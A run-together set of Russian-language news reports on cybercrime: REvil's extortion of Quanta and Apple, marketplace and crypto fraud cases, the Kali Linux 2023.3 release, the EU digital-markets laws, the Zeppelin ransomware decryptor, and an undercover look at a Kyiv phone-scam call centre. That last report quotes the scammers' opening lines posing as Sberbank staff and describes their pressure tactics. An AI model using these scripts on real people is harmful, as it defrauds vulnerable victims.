Так как представители пострадавшей компании отказались платить хакерам, операторы REvil начали обнародовать схемы и чертежи продуктов Apple на своем сайте. Судя по всему, хакеры решили, что шантажировать одного из основных клиентов Quanta Computer может быть выгоднее. По данным СМИ, компания должна была выплатить 50 000 000 долларов до 27 апреля или 100 000 000 долларов после указанной даты.
В общей сложности на сайте злоумышленников был размещен 21 скриншот со схемами Macbook, и хакеры обещали выкладывать новые данные каждый день, пока Apple или Quanta Computer не согласятся заплатить выкуп. «Мы рекомендуем Apple выкупить имеющиеся у нас данные до 1 мая», — угрожали преступники.
Как теперь пишет Bleeping Computer, в новом приватном чате, созданном для переговоров между REvil и Quanta Computer, хакеры сообщили, что ради продолжения переговоров они скрыли страницу со «сливом» данных, а также перестали общаться с прессой. Представители REvil заявляют, что начав с ними диалог, компания «может рассчитывать на хорошую скидку»: выкуп будет снижен 50 до 20 миллионов долларов, а крайний срок выплаты перенесен на 7 мая 2021 года.

Также хакеры предупредили, что если они вновь не получат ответа, то вскоре начнут публиковать чертежи нового iPad и эскизы новых логотипов Apple.

Журналисты пишут, что, по их данным, Quanta Computer так и не ответила на это «щедрое предложение».
Источник: xakep.ru/2021/04/27/revil-vs-apple-2/
Мошенники похитили у одного из крупнейших онлайн-ритейлеров России Wildberries 385 млн руб. Об этом говорится в заявлении, которое компания направила в УВД России по СЗАО Москвы, с просьбой привлечь к ответственности лиц, ответственных за деяние. Первым об инциденте написал телеграм-канал «Банкста».
Wildberries в заявлении раскрыл мошенническую схему, согласно которой подставные продавцы размещали на маркетплейсе несуществующий товар по завышенным ценам и такие же подставные покупатели его оплачивали. Несмотря на то, что мошенники вводили неправильные реквизиты банковской карты при оплате, и операция отклонялась банком, Wildberries получал информацию о том, что платеж осуществлен, и расплачивался с вышеупомянутыми продавцами средствами с собственных счетов, следует из заявления Wildberries в правоохранительные органы.
Представители Wildberries не смогли ответить на вопрос CNews, почему компания при отклонении банком операции даже за «несуществующий» товар все равно расплачивалась с продавцом. «К сожалению, данный вопрос прокомментировать не можем, так как в настоящий момент ведется следствие, и мы не можем разглашать материалы дела»,— сообщили представители компании.
Когда и как быстро мошенники похитили средства
Описанная выше мошенническая схема на площадке Wildberries использовалась впервые в начале апреля 2021 г. Поначалу мошенники совершали небольшие операции на сумму не более нескольких тысяч рублей. Массовую атаку они провели в последнюю неделю мая, однако смеха была сразу выявлена, сообщили представители Wildberries.
«Компания сразу же обратилась в правоохранительные, а также в профильные надзорные органы с целью проинформировать рынок о существовании новых мошеннических схем и с тем, чтобы от них не пострадали другие участники онлайн-ритейла»,— пояснили в Wildberries «Коммерсанту».
Злоумышленники уже установлены и правоохранительными органами ведутся активные следственные действия. В компании добавили, что никто из настоящих покупателей или продавцов не пострадал.
Всем ли маркетплейсам угрожают такие схемы
Подобные схемы в какой-то степени угрожают практически всем маркетплейсам, заявил источник «Коммерсанта». Проблема заключается в недостаточном уровне проверки данных, которые предоставляют продавцы и покупатели, пояснил он. При этом мошеннические схемы возникают почти каждый день и не только на рынке онлайн-ритейла, но и тех же банков, рассказывает «Коммерсанту» президент Национальной ассоциации дистанционной торговли Александр Иванов.
Эксперт также добавил, что просчеты во взаимодействии с продавцами онлайн при таком темпе роста маркетплейсов возможны.
В пресс-службе Ozon и Lamoda на момент выпуска материала на вопрос о том, как их компании защищены от схемы, от которой пострадали в Wildberries, ответить не смогли.
Киберполиция Украины отчиталась об операции против скамеров из Polaris Company, в результате которой были задержаны администраторы проекта. Офис группы был взят штурмом, и, хотя название самой команды не упоминается в пресс-релизе, его можно увидеть в оперативном видео.
Как сообщили сами киберполицейские, группировка работала на рынке с 2021 года. Организованные Polaris атаки были направлены в первую очередь против граждан Чехии и Польши, затрагивая также и жителей других стран ЕС.
«В рамках расследования оперативники обнаружили крупные колл-центры, которые действовали на территории столицы и других регионов Украины. С их помощью обворовывали иностранных граждан, в частности подданных Чехии. Для обезвреживания группировки в рамках международного сотрудничества была создана совместная следственная группа с участием правоохранителей Чешской Республики», — сказано в пресс-релизе.
В ходе следственных мероприятий у восьми задержанных изъяли почти 60 ноутбуков, а также другую компьютерную технику, десятки мобильных телефонов, 75 тысяч долларов, банковские и сим-карты и шесть автомобилей. При этом сообщается, что только с февраля 2023 года члены Polaris заработали, отмыли и обналичили не менее миллиона долларов.
source: cyberpolice.gov.ua/news/ukrayinski-ta-cheski-pravooxoronczi-rozpovily- detali-speczoperacziyi-z-vykryttya-masshtabnoyi-shaxrajskoyi-sxemy-v-yakij- postrazhdaly-gromadyany-yes-194
Вчера вышла [новая версия](https://www.kali.org/blog/kali- linux-2023-3-release/) популярного дистрибутива Kali Linux, ориентированного на этичных хакеров и специалистов по кибербезопасности. Главные новшества релиза 2023.3 перечислены ниже:
По словам команды разработчиков, основное внимание в этом релизе было уделено переработке инфраструктуры Kali Linux в связи с выходом Debian 12 этим летом. Цель этих изменений — повысить надёжность дистрибутива и оптимизировать его компоненты.
Kali Linux 2023.3 уже доступен для скачивания в виде ISO- образа или обновления с действующей системы через следующие команды в консоли:
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware" | sudo tee /etc/apt/sources.list
Click to expand...
sudo apt update && sudo apt -y full-upgrade
Click to expand...
cp -vrbi /etc/skel/. ~/
Click to expand...
[ -f /var/run/reboot-required ] && sudo reboot -f
Click to expand...
Дистрибутив Kali Linux активно используется специалистами по информационной безопасности для тестирования на проникновение, аудита безопасности, исследования уязвимостей. Новая версия призвана расширить их возможности.
С развитием технологий значительная часть преступлений совершается в цифровом пространстве. Это констатируют и следователи, которые также совершенствуют методы изобличения злоумышленников. А с появлением криптовалюты возникли трудности в изъятии незаконного заработка. В расследовании одного из громких уголовных дел, связанных с криптой, следователи даже привлекли сотрудников ФБР и по инициативе СК были внесены новые нормы в указ Президента о криптовалютах. О ходе расследования, трудностях, которые возникали в процессе, и сумме ущерба корреспонденту БЕЛТА рассказал начальник управления по расследованию преступлений против информационной безопасности и интеллектуальной собственности главного Следственного управления центрального аппарата Следственного комитета Сергей Гамко.
Сотрудниками управления по расследованию преступлений против информационной безопасности и интеллектуальной собственности главного следственного управления Следственного комитета Беларуси завершили расследование уголовного дела об уклонении от уплаты налогов в особо крупном размере (ч.2 ст.243 Уголовного кодекса), пособничестве в совершении указанного преступления. Обвинения предъявлены шестерым белорусам.
К расследованию подключили иностранных коллег
Расследование уголовного дела началось более шести лет назад, в 2016 году. Следователи выяснили, что организованная преступная группа путем модификации компьютерной информации похищала средства со счетов иностранных граждан. Вскоре удалось установить псевдоним пользователя, который был напрямую связан с хищением. Для пресечения деятельности злоумышленника следователи по имевшемуся каналу связи МИД Беларуси обратились в ФБР.
Благодаря взаимодействию с американскими коллегами сотрудники Следственного комитета вышли на теневой онлайн-сервис, где оказывались разного рода финансовые услуги. Следователи уже располагали данными об одном из участников и его электронных кошельках. Но для установления всех причастных к незаконной деятельности онлайн-сервиса сотрудникам Следственного ведомства предстояло проделать огромный объем работы. Тогда белорусские следователи вновь привлекли в помощь иностранных коллег.
В Следственном комитете подготовили и направили международные поручения о правовой помощи в учреждения юстиции отдельных государств. Спустя некоторое время была получена информация об IP-адресах доступа к идентификаторам, в которых были зарегистрированы кошельки установленного участника онлайн- сервиса. Информация о его причастности к теневым финансовым операциям подтвердилась. Позже это подтвердил другой участник преступной группы. Он же указал следователям на еще одного фигуранта. Кроме того, в рамках расследования уголовного дела следователи допросили специального агента налоговой службы США, который расследовал деятельность теневого онлайн- сервиса. А сведения, которыми он располагал, были изъяты.
В квартирах участников преступной группы обнаружили более $1,4 млн и 680 тыс. евро
Следователи провели по-настоящему кропотливую и скрупулезную работу по установлению всех деталей преступлений. В течение пяти лет деятельность преступной группы тщательно документировалась, прослеживались связи участников, устанавливались другие фигуранты и их электронные кошельки. Результатом пятилетней работы стало возбуждение уголовного дела по ч.2 ст.243 Уголовного кодекса.
Сотрудники Следственного комитета совместно с МВД провели обыски у участников онлайн-сервиса. Найденные денежные суммы действительно поражают: у фигурантов было изъято более $1,4 млн и 680 тыс. евро. Были изъяты также носители информации, содержащие сведения о преступной деятельности. Кроме того, дома у одного из участников преступной группы обнаружена марихуана.
Следователи с участием фигурантов осмотрели находящиеся в их распоряжении Bitcoin и другие электронные кошельки, а также счета международной системы расчетов WebMoney.
Одним из результатов расследования стало появление новых норм в указе Президента о криптовалютах
Появление новых платежных инструментов и уход преступности в киберпространство потребовали от следователей совершенствования методов работы. Появилась необходимость поиска механизма, который позволяет органам уголовного преследования не только обнаруживать, но и сохранять виртуальные активы, вовлеченные в противоправную деятельность. Законом Республики Беларусь от 6 января 2021 года № 85-З "Об изменении кодексов по вопросам уголовной ответственности" перечень имущества, на которое может быть наложен арест, в примечании к ст.132 Уголовно-процессуального кодекса дополнен криптовалютой. Сегодня эта норма активно применяется в практической деятельности следователей.
Кроме того, по инициативе Следственного комитета в указе Президента Республики Беларусь от 14 февраля 2022 года №48 "О реестре адресов (идентификаторов) виртуальных кошельков и особенностях оборота криптовалюты" были закреплены принципы обращения криптовалют в уголовном процессе. Целый ряд новых норм вступил в силу с 14 мая 2022 года.
В чем заключается трудность расследования уголовных дел о незаконном обороте криптовалюты
Противодействие подобным преступлениям затрудняется тем, что их раскрытие и расследование во многом зависят от международного сотрудничества. При взаимодействии с иностранными коллегами следователи сталкиваются с определенными трудностями. Дело в том, что получить оперативно информацию о расследуемых преступлениях и фигурантах не всегда удается. Это объясняется длительным исполнением поручений и просьб об оказании правовой помощи. А порой их вовсе оставляют без рассмотрения по существу.
По этой причине в следственной практике появились альтернативные способы получения доказательств. Они позволяют устанавливать и привлекать к ответственности злоумышленников, которые совершают преступления с использованием криптовалют. Кроме того, важным элементом является принятие мер для изъятия и конвертации криптовалюты в реальную валюту.
Ярким примером реализации новых способов получения доказательств и является это уголовное дело. Из-за отсутствия технической возможности реализации уголовно-процессуального запрета на распоряжение криптовалютами в виртуальном пространстве возникла необходимость изымать их путем проведения транзакций на аппаратный кошелек, подконтрольный правоохранительному органу. В Следственном комитете принят локальный правовой акт. Благодаря этому ведомственному документу следователи могут использовать в служебной деятельности аппаратные криптокошельки или устройства, которые позволяют безопасно хранить ключи доступа к криптовалютам собственника.
Следователям удалось конвертировать криптовалюту обвиняемых, получилось более $38 млн
Во время расследования обвиняемые добровольно перевели криптовалюту на публичные веб-адреса, которые поддерживаются подконтрольным Следственному комитету криптокошельком. После этого на криптовалюты обвиняемых наложили арест. Позже они обратились с ходатайством об освобождении криптовалюты от ареста, чтобы уплатить доход, который был получен преступным путем.
Следователи вывели из электронной среды и конвертировали в белорусские рубли цифровые активы обвиняемых, которые включали в себя 587 BTC, 923 ETH, 1 359 672 USDT, 71 347 USDC, 30 LTC, а также другие токены и электронные деньги. После конвертации на банковские счета, подконтрольные Следственному комитету, было переведено более $38 млн, которые в последующем были обращены в доход государства.
Преступная группа выручила более Br290 млн
Собранные по делу доказательства позволили установить всю схему преступления и предъявить фигурантам обвинения. Известно, что 42-летний житель Минска и пятеро его знакомых с января 2012 года по май 2018 года осуществляли деятельность, связанную с отчуждением и приобретением электронных денег, криптовалют. В результате преступная группа выручила более Br290 млн. Они умышленно скрыли налоговую базу и не уплатили подоходный налог в сумме более Br37 млн.
Следователи также выяснили, что изначально сервис работал на киберпреступном форуме. Позже для привлечения новых клиентов сервис стали рекламировать на других ресурсах, в том числе посвященных теневому заработку в интернете. Сама группа была создана не позже 2011 года и получала прибыль от оказания подобных услуг. С годами клиентов становилась все больше и заработок стал расти. Участники группы использовали более 85 учетных записей и абонентских номеров для связи с потенциальными клиентами.
У злоумышленников были собственные курьеры, клиентская база и служба технической поддержки
Роли каждого участника были четко распределены. В группу входили организатор и его помощники. Были и курьеры, которые встречались с клиентами сервиса, получали от них деньги, после чего передавали и зачисляли их на подконтрольные счета. У злоумышленников была даже своя группа технической поддержки клиентов, которая вела переписку по вопросам работы сервиса.
В ходе расследования уголовного дела наложен арест на имущество обвиняемых на общую сумму более Br34 млн. Это не только наличность, но и квартиры, земельные участки, капитальные строения, торговые и административные помещения, гаражи, автомобили и дорогостоящие предметы.
Фигуранты - индивидуальные предприниматели, бухгалтер и руководители фирм
Фигуранты дела - шестеро мужчин в возрасте от 31 до 43 лет, все граждане Беларуси. Пятеро ранее судимы не были, у одного судимость снята и погашена. Трое - индивидуальные предприниматели, двое работали директорами обществ с ограниченной ответственностью, один - бухгалтером. Все шестеро сотрудничали со следствием и ходатайствовали об освобождении от уголовной ответственности на основании ст.88-1 Уголовного кодекса. По требованию этой статьи обвиняемые добровольно и в полном объеме возместили в бюджет подоходный налог в сумме более Br37 млн, уплатили пени, внесли уголовно-правовую компенсацию.
После окончания расследования уголовное дело передано прокурору.
в ЕС: что это значит для пользователя
На днях на многих технологических СМИ буквально прогремела новость — Европейский Союз принял два новых закона, которые регулируют деятельность крупных технологических компаний. В новости на Хабре говорится о том, что эти два закона будут иметь далекоидущие последствия для таких крупных корпораций, как Apple и Google. В частности, им придется разрешить установку приложений пользователями из сторонних каталогов.
Но влияние этих двух законов, на самом деле, шире, чем можно было бы подумать. Давайте посмотрим, что они означают для индустрии. Разбираемся под катом.
Чиновники Евросоюза приняли сразу два важных закона. Это закон о цифровых сервисах (Digital Services Act — DSA) и закон о цифровых рынках (Digital Markets Act — DMA). Оба они являются неким сводом правил, обязательных для исполнения теми онлайн-платформами, от которых зависит работа, досуг и, собственно, комфортное существование пользователей. Внимание оказывается, в первую очередь, тем компаниям, от которых зависят тем либо иным образом десятки миллионов пользователей.
Законы будут вскоре введены в действие на территории всего Евросоюза, включая и те компании, которые не базируются в этом регионе. В целом, законодатели пытаются оказать влияние на многие компании, но все мы понимаем, кто является целью в первую очередь — это Apple, Google, и некоторые другие корпорации из США и других стран.
Бюрократия в Евросоюзе довольно сильно развита, здесь подразумевается негативная коннотация. Для согласования важных документов порой требуются месяцы или даже годы, причем вовсе не факт, что такие документы в итоге не уходят под сукно. Но в отношении двух новых законов можно сказать, что им просто не дали забыться и пропасть. Впервые о них стало известно в декабре 2020 года, с тех пор несколько чиновников ЕС активно работали над совершенствованием и реализацией новых законодательных инициатив.
Сейчас осталась маленькая формальность — обоим документам предстоит пройти процедуру утверждения Советом Европейского союза и публикацию в Официальном журнале ЕС. Но это именно что формальность — в том, что законы таки вступят в силу, нет никаких сомнений. Ну а в силу они вступают спустя 20 дней после публикации. Так что это где-то осень 2022 года.
Как и говорилось выше, речь идет не только и не столько об Apple и Google, сколько обо всех крупных корпорациях из разных отраслей цифрового сегмента — от хостинга и провайдеров до онлайн-маркетплейсов и онлайн-платформ. Поскольку именно Google и Apple у всех на слуху, то о них и речь в первую очередь.
В заявлении авторов инициативы говорится о том, что крупные платформы должны воздерживаться от продвижения собственных интересов (необычно звучит в отношении крупного бизнеса, правда?), они обязаны делиться данными с представителями других отраслей, а также сделать возможным работу пользователей с большим количеством каталогов приложений, чем сейчас. Авторы законов попытались сформулировать в нескольких строках то, что корпорации могут делать, и чего не должны делать ни в коем случае.
Наиболее интересной ситуация выглядит в отношении именно этих двух компаний, поскольку им принадлежит два крупнейших каталога приложений для мобильных устройств. Компании неоднократно пытались защитить введенные ими правила, против которых выступали как обычные пользователи, так и компании.
Но сейчас, похоже, корпорациям придется смириться — одно из положений принятых в ЕС законов прямо говорит о том, что владельцам каталогов приложений нужно открыть возможность пользователям для установки софта со сторонних площадок. Кроме того, законы обязуют компании открыть возможность для простого удаления предустановленных приложений или изменения их настроек. Разработчикам должны предоставить возможность использовать собственные платежные системы.
На последний пункт, вероятно, повлияло разбирательство Epic Games с Apple. Последняя подала иск в суд, поскольку Epic Games нарушила соглашение с Apple и добавила способ оплаты подписок в игру Fortnite для iOS в обход правил магазина приложений. Суд США постановил, что игровая компания обязана выплатить Apple в размере 30% от всех ранее полученных доходов. Есть, правда, одно «но» — тогда же суд запретил Apple ограничивать действия разработчиков приложений собственного каталога.
Так, компания лишилась права в одностороннем порядке запрещать пользователям использовать разные методы оплаты как за приложение, так и за внутренние покупки, кроме App Store. Соответственно, суд дал разрешение разработчикам использовать специальные элементы или ссылки внутри приложений для информирования пользователей об альтернативных способах оплаты.
Сейчас Apple и Google запретили блокировать платежи через сторонние системы с целью получения комиссии со всех транзакций в размере 30%. Так что с уверенностью можно сказать, что тогда, в 2021 году, Apple выиграла сражение, но проиграла войну.
Принятые законы вводят понятие «посредника» (англ. Gatekeeper, но в текущем контексте это явно не «привратник», а «посредник»). Такая категория присваивается компании, которая:
• Имеет «сильное экономическое положение» и «важное влияние» на внутренний
рынок ЕС.
• Имеет «сильную позицию посредника», а именно — соединяет пользователей и
большое количество партнеров.
• Уже имеет или будет иметь в ближайшем будущем «устойчивое и прочное
положение на рынке», а именно соответствует первым двум пунктам не менее трех
лет подряд.
Как только законы вступят в силу, как говорилось выше, это случится осенью 2022 года, Еврокомиссия собирается провести анализ крупнейших компаний. В ходе этой работы у корпораций запросят необходимые данные для того, чтобы установить, кто может называться «посредником». После присвоения соответствующей категории у компании будет полгода на то, чтобы привести свою деятельность в соответствие с новыми нормами. Если компания попытается каким- либо образом избежать этого, ей грозит штраф в размере до 10% от годового оборота, причем не европейского, а глобального. И это только за первое нарушение, за второе придется заплатить уже 20%. А это серьезно для компании любого размера.
Вот несколько наиболее показательных положений законов, принятых в ЕС:
• Компании обязаны разрешить пользователям установку сторонних приложений или
магазинов приложений для работы на соответствующей платформе или
взаимодействия с ней.
• Пользователи должны получить возможность удаления предустановленных
приложений, а также изменять настройки по умолчанию как в ОС, так и в
браузерах, если эти настройки созданы «посредниками» для того, чтобы
пользователь использовал продукты и сервисы такой компании.
• Компании обязаны разрешить компаниям, которые используют их платформы
продвигать и продавать продукты на внешнем рынке и заключать соглашения вне
платформ.
• Компании ни в коем случае не должны вынуждать разработчиков использовать
исключительно сервисы «посредников».
Насколько можно понять, Jailbreak после вступления в силу законов ЕС уже не пригодится — фактически, чиновники Евросоюза ввели этот термин, вернее, то, что он обозначает, в правовое поле. За исключением некоторых нюансов, конечно.
И да — важный момент. Наконец-то целевой аудиторией «посредников» и их продукции не могут выступать дети. А настройки рекламы не могут включать настройки для аудиторий с разной национальностью, сексуальной ориентацией или политическими взглядами. Нарушение чревато штрафом до 6% глобального оборота компании.
Собственно, все эти положения относятся не только к Apple и Google, но и другим компаниям, так что в ближайшее время можно будет узнать, кто попал под действие закона и какие последствия это будет иметь на такие компании.
Работа велась скрытно, чтобы злоумышленники не обнаружили уязвимости в своем ПО.
ИБ-специалисты из Unit221b нашли уязвимости в механизме шифрования вымогательского ПО Zeppelin и использовали их для создания рабочего дешифратора, который они использовали с 2020 года, чтобы помочь компаниям- жертвам восстановить файлы, не платя злоумышленникам ни гроша. Работа велась скрытно, чтобы хакеры не узнали об уязвимостях в своем шифровальщике.
Специалисты Unit221b твердо решили взломать Zeppelin после того, как увидели, что операторы вымогательского ПО атакуют благотворительные организации, некоммерческие организации и даже приюты для бездомных. В обнаружении уязвимых мест шифровальщика компании помог анализ вредоноса от Blackberry Cylance.
Исследователи заметили, что Zeppelin использует эфемерный 512-битный ключ RSA для шифрования ключа AES, который не давал жертве получить доступ к зашифрованным данным. Ключ AES хранился в нижнем колонтитуле каждого зашифрованного файла, поэтому если кто-то мог взломать ключ RSA-512, то он получал возможность расшифровать файлы, не платя злоумышленникам.

Логика ключей шифрования Zeppelin
Специалисты из Unit221b обнаружили, что открытый ключ оставался в реестре зараженной системы в течение примерно пяти минут после завершения шифрования данных. Ключ можно было извлечь тремя способами – вырезав данные реестра из необработанной файловой системы, дампа памяти registry.exe и непосредственно из файла NTUSER.Dat в каталоге "/User/[имя_пользователя]/". Полученные данные были обфусцированы с помощью RC4. Как только эксперты разобрались с этим слоем шифрования, им осталось преодолеть последнее препятствие – слой шифрования с использованием RSA-2048.

Открытый ключ в обфусцированном виде
Чтобы преодолеть это препятствие, специалисты Unit221b использовали в общей сложности 800 CPU на 20 серверах, каждый из которых обрабатывал небольшие части ключа. Через шесть часов ключ был взломан, и аналитики смогли извлечь ключ AES из нижнего колонтитула файла.
Основатель Unit221b Лэнс Джеймс рассказал изданию BleepingComputer, что компания решила обнародовать все подробности из-за того, что в последние месяцы количество жертв вымогательского ПО Zeppelin значительно сократилось. Лэнс сказал, что инструмент для расшифровки должен работать даже с последними версиями Zeppelin и будет доступен для всех жертв, которые оставят запрос.
Телефонное мошенничество - один из самых быстрорастущих сегментов криминального рынка. Особенно, когда все вокруг диджитализируется - и в первую очередь работа банков.
Миллионы украинцев уже получали от таких мошенников "звонки счастья" - о якобы заблокированных карточках. Но этим дело не ограничивается. Звонят от имени "попавших в беду" родственников и по другим, не менее радикальным поводам.
Причем в последнее время украинские мошенники начали выходить на международный уровень. В силу языковой и ментальной близости украинцы активно работают на российском рынке.
Как устроены "разводные" колл-центры в Киеве и сколько они зарабатывают, в том числе на россиянах, - разбирался журналист "Страны", который устроился в один из таких офисов на работу.
Главные схемы обмана
Большинство схем, действующих годами, можно разделить на несколько типов:
Родственник попал в беду. В такой схеме аферист представляется сотрудником полиции, который предлагают решить возникшую проблему за определенную суму.
Цель мошенника - застать врасплох. Они подгоняют со временем, давят, могут даже повысить голос, чтобы вызвать сильные эмоции жертвы и не дать ей времени обдумать ситуацию.
Это самый банальный способ "развода", рассчитанный в первую очередь на пожилых людей - лучше на бабушек.
Как правило, такие мошенники звонят из мест лишения свободы. Но не только. Однажды знакомому журналисту позвонил некто и детским голосом начал кричать в трубку "папа, спаси, я в милиции". Тот воскликнул "Какое счастье, я раньше и не знал, что у меня есть сын!"
Мошенничество с товарами. Здесь спектр методов воздействия достаточно широк. Мошенники могут выставлять товары по заниженной цене (например, товар, который стоит 60 тысяч, будут продавать за 20 объясняя "срочностью").
Соблазнившись низкой ценой, человек соглашается выслать "гарантийную предоплату" - это и будет наваром мошенников.
Банковские аферисты. Это, пожалуй, самое популярное и быстро растущее направление среди мошенников.
Они пытаются выведать данные вашей банковской карты: номер, срок действия и CVV-код. В такой схеме мошенники зачастую представляются сотрудником банка, который звонит помочь разобраться с "подозрительной активностью" в отношении вашей карты. Якобы аферисты пытаются украсть у вас деньги, и "мы сейчас с этим разберемся".
Другой способ - создание сайтов-клонов известных компаний или банковских структур, с помощью которых выманивают данные банковских карт, чтоб в дальнейшем списать оттуда деньги. Такой метод называют "фишинг" (от англ. "рыбалка").
С фишингом есть и более сложные схемы. Например, человек выставляет на продажу в интернет детское кресло. После чего в Viber он получает сообщение от якобы покупателя. Аферист заявляет, что заплатит онлайн.
Затем скидывает ссылку на сайт, который визуально похож на портал "Новой почты". Только домен сайта немного отличается: nova-payment.сom (это и есть фишинговый сайт). Перейдя по ссылке, человек видит форму для заполнения. Вводит номер карты CVV-код, срок действия и даже баланс на счету.
Естественно, "фишеры" получают эти данные, а вместе с ними - и доступ к счету.
Во всех случаях мошенники будут пытаться держать с вами непрерывную связь вплоть до получения денег, не давая вам возможности опомниться, перезвонить "пострадавшему" родственнику или в банк.
Они будут сбивать вас с толку, давить и даже угрожать, ведь в любую минуту человек может сорваться и понять, что его обманывают. Именно поэтому, взяв человека в "оборот", они попытаются выжать максимум из ситуации.
Пять миллиардов в месяц и украинский след
Прошлым летом в России прогремел скандал. Оказалось, что в легендарном СИЗО "Матросская тишина" работал подпольный колл-центр. Служба безопасности пострадавшего от их действий крупного банка зафиксировала десятки телефонов с сотнями симок, которые "обрабатывали" россиян.
Информацию мошенники получают через теневой рынок персональных данных. На сегодня в России существует около 12 торговых площадок по продаже персональной информации.
Когда МВД и ФСБ "накрывали" центр, заключенные блокировали двери и уничтожали технику. Но все равно в камерах нашли десятки телефонов, роутеры, беспроводные наушники и микрофоны.
Эта ситуация обнажила серьезную проблему: пенитенциарные учреждения - закрытые системы, и под крышей их руководства мошенники могут чувствовать себя недосягаемыми для правоохранителей.
Но появилась схема, которая еще проще — работать из Украины, куда ФСБ точно не доберется.
По данным "Сбербанка", телефонные мошенники ежемесячно крадут со счетов россиян до пяти миллиардов рублей. Заместитель предправления "Сбера" Станислав Кузнецов сообщил, что средний чек по успешной мошеннической операции составляет около 8 тысяч рублей. А на один "колл-центр" приходится от 3 до 7 тысяч звонков в сутки. Ежемесячно в России официально фиксируют более 300 тысяч мошеннических звонков.
Также Кузнецов добавил, что большинство таких колл-центров, которые используют подмену номеров для имитации звонков от банка, располагается в Украине.
"Большинство злоумышленников из России стали перебираться в Украину, поскольку расходы на содержание команды операторов в Украине ниже, а для российских правоохранительных органов компании в Украине менее доступны", – рассказал Кузнецов.
Один из таких колл-центров мы обнаружили в самом сердце Киева — на улице Владимирской буквально по соседству с главным офисом СБУ.
**" Ты понимаешь куда пришел работать?" **
Как оказалось, устроиться в такой "колл-центр" совсем нетрудно. Интернет переполнен предложениями аферистов о сотрудничестве. Выглядят они примерно так:
"Неофициальное трудоустройство, без трудовой книжки и документов. Требования к сотруднику следующие:
Грамотная речь, свободное знание русского языка, минимальные навыки работы с ПК, усидчивость, внимательность, аккуратность. Опыт работы приветствуется, но необязателен.
Высокий уровень дисциплины, желание развиваться и работать на результат команды. По словам работодателей, такие навыки помогут вам зарабатывать от 20 тысяч гривен в месяц. График работы с 09:00 до 19:00 пять дней в неделю. Зарплату выдают каждую неделю".
После связи с менеджером одного из таких "колл-центров", встречу назначили буквально через несколько часов. Офис расположен в уютном квартале центра столицы. Очевидно, дела идут хорошо.
Собеседование с потенциальным сотрудником, то есть со мной, проводит парень лет 35 по имени Михаил. Он встретил меня у входа в жилой дом на улице Владимирская. Их компания, которая не имеет названия, арендует небольшое помещение на пятом этаже.
На 60 квадратных метрах есть туалет и небольшая переговорная. Установлено 12 рабочих мест, но заняты всего четыре. Работает два парня и две девушки.
Как сообщил Михаил, компания в новый офис переехала совсем недавно, дела идут хорошо, расширяются, поэтому набирают новых людей.
Собеседование проводят в небольшой переговорной. Первый вопрос Михаил задает очень тихо, как будто боится, что я его могу записать: "Ты понимаешь куда пришел работать?" – после этого, не менее тихим голосом, не дождавшись моего ответа, он продолжил рассказывать специфику их работы:
"Мы звоним гражданам России, представляемся техническими сотрудниками "Сбербанка" и пытаемся развести людей на то, чтобы они перевели деньги со своих банковских карт на наши, а если у них нет денег, то чтобы они взяли кредит и перевели деньги нам. Как это делать, написано в методичке", – но сразу пытается успокоить, говорит, что банковские карты людей застрахованы, а "украсть у банка не страшно".
Я сделал удивленное лицо, но сказал, что меня интересует только хорошая зарплата. Михаилу это, очевидно, понравилось - так как после этой фразы он заметно расслабился и попросил рассказать мне про свой опыт работы до этого.
"Нужно было торговать акциями, находить людей, которым интересно инвестировать в акции, после этого передавал их менеджерам постарше, которые уже закрывали сделку, но деньги платили маленькие вот и решил поискать что-то другое", - выложил я перед ним свою легенду.
А для того чтобы пройти проверку по соцсетям, я признался, что работал оператором на ТВ, но пожаловался, что там мало платят.
Спустя три минуты разговора начался короткий инструктаж. Михаил дал мне методичку - набор фраз, спичей, которые выстроены в определенной последовательности, по которым нужно общаться с потенциальной жертвой. Сами же аферисты называют жертв "лохами".
Приводим несколько цитат из методички:
"Здравствуйте! Вас беспокоит технический сотрудник отдела (Сбербанк), младший специалист Волконский Анатолий. Обращаюсь к вам касательно такого вопроса. Две минуты назад была подана заявка на смену вашего финансового номера. Вы данную заявку подтверждаете?".
В методичке прописаны варианты ответов на самые частые вопросы. Если жертва клюет наживку, ее переводят на менеджера поопытнее. В данном случае это Михаил, который проводит со мной собеседование. По легенде, он сотрудник МВД, которому банк передал дело из-за "мошеннических действий с банковской картой".
У "сотрудника МВД" также прописаны свои спичи. Но их мне не показали, заявив, что сначала нужно научиться делать "холодные звонки" - так они называют номера телефонов, на которые звонят впервые.
На этом мое собеседование закончилось. Никто даже не уточнил мое полное имя или паспортные данные. После чего меня подвели к одному из сотрудников, который занимался "холодными" звонками и предложили послушать, как он звонит потенциальным жертвам. Мне сказали, что свой первый звонок я смогу сделать на следующий день после собеседования.
Клюет 5-7 "лохов" на 300 звонков
За компьютером сидел молодой парень, студент-социолог. Зовут его Артем, ему 20, он из Винницы, в Киеве живет три года с тех пор, как приехал учиться. В данной компании работает три месяца, искал работу на лето, но сейчас задумывается перевестись на заочную форму и продолжить работать.
Рабочее место выглядит скромно. Стол с компьютером и наушниками с микрофоном. На компьютере открыто всего две вкладки: телефонная база клиентов "Сбербанка" и шпаргалки с диалогами.
Все сотрудники четко осознают, что они занимаются мошенничеством. Они представляются жертвам вымышленными именами и звонят им через программы подмены номеров, которые копируют номера реальных сотрудников российского "Сбербанка" или МВД РФ.
У каждого из моих коллег есть с десяток историй о том, как они разводили "лохов" и как те им плакали в трубку. Рассказывают они это с вдохновением и чувством хорошо выполненной работы.
"Мне эта работа нравится. Здесь нужно чувствовать человека, я буквально по первым фразам и интонации голоса могу определить, клюнет "лох" на развод или нет. Их нужно чувствовать, это психология",– увлеченно делится секретами Артем.
Парень сравнивает эту работу с рыбалкой: "Ты открываешь базу данных, в которой номера тысяч людей, и ты выбираешь любого из них. Это как на речке, ты можешь забросить удочку в любое место, но не везде клюнет. Ежедневно я делаю около 300 звонков, и всего 5-7 из них клюют. Иногда ни одного, но такое редко бывает, "лохов" пока хватает".
Много зависит от качества базы контактов. Если база новая и ее никто не прозванивал, то вероятность найти нужного клиента очень большая. Но большинство контактных баз уже использованы по несколько раз и 95% клиентов сразу понимают, что им звонят мошенники. "Но ради тех 5%, которые верят, можно работать",– рассказывает Артем.
В перерывах между звонками ребята обсуждают новинки в мире смартфонов, рэперов и путешествия.
Платят по $100 в неделю плюс 7,5% с "продаж"
Рабочий день заканчивался в 19:00. За три часа, которые я провел в "колл- центре", им не удалось развести ни одного человека - но до моего прихода они смогли провернуть две сделки.
